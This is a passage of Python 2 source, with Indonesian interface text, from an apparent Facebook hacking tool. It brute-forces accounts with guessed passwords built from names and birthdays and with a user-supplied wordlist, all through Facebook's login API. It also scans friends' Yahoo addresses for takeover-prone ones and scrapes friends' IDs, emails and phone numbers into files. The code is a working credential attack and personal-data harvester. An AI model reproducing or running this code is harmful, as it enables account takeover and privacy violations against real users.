print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
pass2 = b['firs_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + ['name']
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
pass4 = b['last_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
pass6 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mKamu ingin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak Ditemukan'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token Tidak Ada'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mSimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Friend not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Friend not found'
